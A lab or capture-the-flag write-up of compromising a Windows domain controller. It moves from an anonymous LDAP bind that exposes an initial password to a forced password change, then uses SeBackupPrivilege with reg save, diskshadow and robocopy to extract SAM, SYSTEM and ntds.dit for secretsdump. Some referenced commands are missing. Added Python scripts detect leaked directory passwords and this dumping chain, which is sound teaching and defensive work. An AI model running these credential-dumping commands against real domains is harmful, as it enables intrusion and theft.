```
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-06 14:47:47Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T14:31:02
| Not valid after:  2025-09-04T14:31:02
| MD5:   48f2:c223:e5c4:356d:b768:8571:f1c6:8950
| SHA-1: 03fd:ff73:d5e1:92bd:32bf:d747:c3fb:bb46:ff4e:6d2d
|_ssl-date: 2025-03-06T14:49:20+00:00; -2h00m00s from scanner time.
| rdp-ntlm-info:
|   Target_Name: BABY
|   NetBIOS_Domain_Name: BABY
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: baby.vl
|   DNS_Computer_Name: BabyDC.baby.vl
|   DNS_Tree_Name: baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-03-06T14:48:39+00:00
5357/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49674/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55620/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
59532/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose

Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 29424/tcp): CLEAN (Timeout)
|   Check 2 (port 15632/tcp): CLEAN (Timeout)
|   Check 3 (port 18953/udp): CLEAN (Timeout)
|   Check 4 (port 41352/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: -2h00m00s, deviation: 0s, median: -2h00m00s
| smb2-time:
|   date: 2025-03-06T14:48:41
|_  start_date: N/A
```
FOOTHOLD
LDAP
After some enumeration we found that LDAP allowed anonymous (null session) binds.
After running a query against the whole LDAP directory with the command below, we found that one user had a description field containing an initial password, BabyStart123!. We will first try that password for the user teresa.bell and, if it does not work, spray it against the rest of the users.
```
# Teresa Bell, it, baby.vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Teresa Bell
sn: Bell
description: Set initial password to BabyStart123!
```
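Credentials left in free-text directory attributes are exactly what an anonymous bind exposes, so a directory owner should find them before anyone else does. As an added example, not part of the original writeup, the Python below parses LDIF output like the entry above and flags description, info and comment values that mention a credential. The sample LDIF is constructed: it is modelled on the entry shown, with a second benign entry added so the scan has a negative case; the attribute list and keyword regex are assumptions for the demo.

```python
import re
from typing import Dict, Iterator, List, Optional

# Constructed sample LDIF, modelled on the ldapsearch output shown above.
# The second entry is an ordinary account, included as a negative case;
# its description is folded across two lines (RFC 2849 continuation).
SAMPLE_LDIF = """\
# Teresa Bell, it, baby.vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: top
objectClass: user
cn: Teresa Bell
sn: Bell
description: Set initial password to BabyStart123!

# Example User, it, baby.vl
dn: CN=Example User,OU=it,DC=baby,DC=vl
objectClass: top
objectClass: user
cn: Example User
description: Helpdesk technician,
  second-line support
"""

# Attributes where operators commonly leave free text (and, sometimes, secrets).
FREE_TEXT_ATTRS = ("description", "info", "comment")

# Keywords that suggest a value is talking about a credential (assumed list).
CREDENTIAL_HINT = re.compile(r"\b(pass(word|wd)?|pwd|credential|pin)\b", re.IGNORECASE)


def parse_ldif(text: str) -> Iterator[Dict[str, List[str]]]:
    """Yield one dict per LDIF entry, mapping attribute -> list of values.

    Skips '#' comment lines and joins folded continuation lines (a line
    starting with one space belongs to the previous value). Base64 values
    ('attr:: ...') are kept encoded; decoding them is out of scope here.
    """
    entry: Dict[str, List[str]] = {}
    last_attr: Optional[str] = None
    for raw in text.splitlines() + [""]:      # trailing "" flushes the last entry
        if raw.startswith("#"):
            continue
        if raw == "":
            if entry:
                yield entry
            entry, last_attr = {}, None
            continue
        if raw.startswith(" ") and last_attr is not None:
            entry[last_attr][-1] += raw[1:]   # folded line: drop the single leading space
            continue
        attr, _, value = raw.partition(":")
        if value.startswith(":"):
            value = value[1:]                 # '::' marks a base64 value; left as-is
        entry.setdefault(attr, []).append(value.strip())
        last_attr = attr


def find_credential_hints(text: str) -> List[Dict[str, str]]:
    """Return one finding per free-text attribute value that mentions a credential."""
    findings: List[Dict[str, str]] = []
    for entry in parse_ldif(text):
        dn = entry.get("dn", ["<no dn>"])[0]
        for attr in FREE_TEXT_ATTRS:
            for value in entry.get(attr, []):
                if CREDENTIAL_HINT.search(value):
                    findings.append({"dn": dn, "attribute": attr, "value": value})
    return findings


if __name__ == "__main__":
    for f in find_credential_hints(SAMPLE_LDIF):
        print(f"{f['dn']}: {f['attribute']} = {f['value']!r}")
```

To run this against a real directory, feed it the `-LLL` output of ldapsearch for the user containers; every hit is an entry whose free text should be cleaned up and whose referenced account should be treated as having a compromised initial password.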
The credentials we found do not work for Teresa.Bell, so we will gather all of the users and password spray. We gathered the account names through the search below, BUT it was not the correct way:
The STATUS_PASSWORD_MUST_CHANGE flag tells us that we first need to change the password before we are able to log in as that user. Using the smbpasswd tool we were able to change Caroline's password to Password123!
```
smbpasswd -r 10.10.114.53 -U 'Caroline.Robinson'
```
We can check whether we have WinRM access with the command below.
The user we obtained has the SeBackupPrivilege enabled. Now we can copy the SAM and SYSTEM hives of HKLM and crack them locally.
Create a temp directory:
```
mkdir C:\temp
```
Copy the SAM and SYSTEM hives of HKLM to C:\temp and then download them.
```
reg save hklm\sam C:\temp\sam.hive
reg save hklm\system C:\temp\system.hive
```
Change to the temp folder and download the SYSTEM and SAM hives:
```
download sam.hive
download system.hive
```
Finally, use impacket-secretsdump to obtain the NTLM hashes:
```
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
```
Now we can log in using evil-winrm and get the root flag.
NTDS.DIT
We can see that we cannot log into the machine, as the hash we got is for the local Administrator. We have to get the hash of the account in the domain (which has exactly the same name). In order to do this, we have to grab ntds.dit as well.
We use the following diskshadow script (xct's script) to expose a shadow copy of C: so that ntds.dit can be copied:
```
# save this in script.txt
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX
```
Then we run the commands below to copy ntds.dit out of the shadow copy we just exposed:
```
# run diskshadow
diskshadow /s script.txt
# copy ntds to c
robocopy /b E:\Windows\ntds . ntds.dit
```
After downloading ntds.dit to our local machine, we run secretsdump again:
```
impacket-secretsdump -sam sam.hive -system system.hive -ntds ntds.dit LOCAL
```
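Both the SAM/SYSTEM hive export in the foothold section and the diskshadow/robocopy steps above leave distinctive process-creation telemetry on the domain controller, and they cluster under one account within minutes. As an added example, not part of the original writeup, the Python below runs simple detection logic over constructed Windows Security 4688-style events (process creation with command-line auditing enabled) and correlates the rules that fire per user. The event records, the rule names, the threshold and the svc_backup and jdoe accounts used as benign noise are all assumptions for the demo; the attacker-side command lines are the ones this writeup shows.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List

# Constructed sample events in the shape of Security event 4688 fields.
# Not real telemetry: the first four mirror the command lines in this writeup,
# the last two are benign noise that a naive image-name match would flag.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"SubjectUserName": "Caroline.Robinson", "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\sam C:\temp\sam.hive"},
    {"SubjectUserName": "Caroline.Robinson", "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\system C:\temp\system.hive"},
    {"SubjectUserName": "Caroline.Robinson", "NewProcessName": r"C:\Windows\System32\diskshadow.exe",
     "CommandLine": r"diskshadow /s script.txt"},
    {"SubjectUserName": "Caroline.Robinson", "NewProcessName": r"C:\Windows\System32\Robocopy.exe",
     "CommandLine": r"robocopy /b E:\Windows\ntds . ntds.dit"},
    {"SubjectUserName": "svc_backup", "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query HKLM\Software\Microsoft\Windows\CurrentVersion"},
    {"SubjectUserName": "jdoe", "NewProcessName": r"C:\Windows\System32\Robocopy.exe",
     "CommandLine": r"robocopy C:\Users\jdoe\Documents D:\backup /e"},
]


@dataclass(frozen=True)
class Rule:
    name: str
    image: str                                   # process basename, lowercase; "" = any image
    predicate: Callable[[str, List[str]], bool]  # (lowercased command line, its tokens) -> bool


# The three hives that together yield local credential material.
HIVE_RE = re.compile(r"hklm\\(sam|system|security)\b")

RULES: List[Rule] = [
    # reg.exe exporting a credential hive; 'reg query' against HKLM does not match.
    Rule("reg_save_of_credential_hive", "reg.exe",
         lambda cmd, toks: "save" in toks and HIVE_RE.search(cmd) is not None),
    # diskshadow driven from a script file, as in the writeup.
    Rule("diskshadow_scripted_run", "diskshadow.exe",
         lambda cmd, toks: "/s" in toks),
    # robocopy in backup mode (/b), which relies on SeBackupPrivilege.
    Rule("robocopy_backup_mode_copy", "robocopy.exe",
         lambda cmd, toks: "/b" in toks),
    # Any process whose command line names the AD database.
    Rule("ntds_dit_referenced", "",
         lambda cmd, toks: "ntds" in cmd),
]


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules that fire for one event, in RULES order."""
    image = event.get("NewProcessName", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "").lower()
    toks = cmd.split()
    return [r.name for r in RULES
            if (not r.image or image == r.image) and r.predicate(cmd, toks)]


def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each user to the sorted set of distinct rules that fired for them."""
    hits: Dict[str, set] = {}
    for ev in events:
        names = classify(ev)
        if names:
            hits.setdefault(ev["SubjectUserName"], set()).update(names)
    return {user: sorted(rules) for user, rules in hits.items()}


def suspicious_users(events: List[Dict[str, str]], threshold: int = 2) -> List[str]:
    """Users for whom at least `threshold` distinct rules fired (assumed threshold)."""
    return sorted(u for u, rules in scan(events).items() if len(rules) >= threshold)


if __name__ == "__main__":
    for user, rules in scan(SAMPLE_EVENTS).items():
        print(f"{user}: {', '.join(rules)}")
    print("escalate:", suspicious_users(SAMPLE_EVENTS))
```

Requiring two distinct rules per account before escalating is what keeps the legitimate backup and file-copy noise out of the alert while still catching the full chain: one account exporting hives, snapshotting the volume and copying ntds.dit is a credential-dumping sequence, not routine administration.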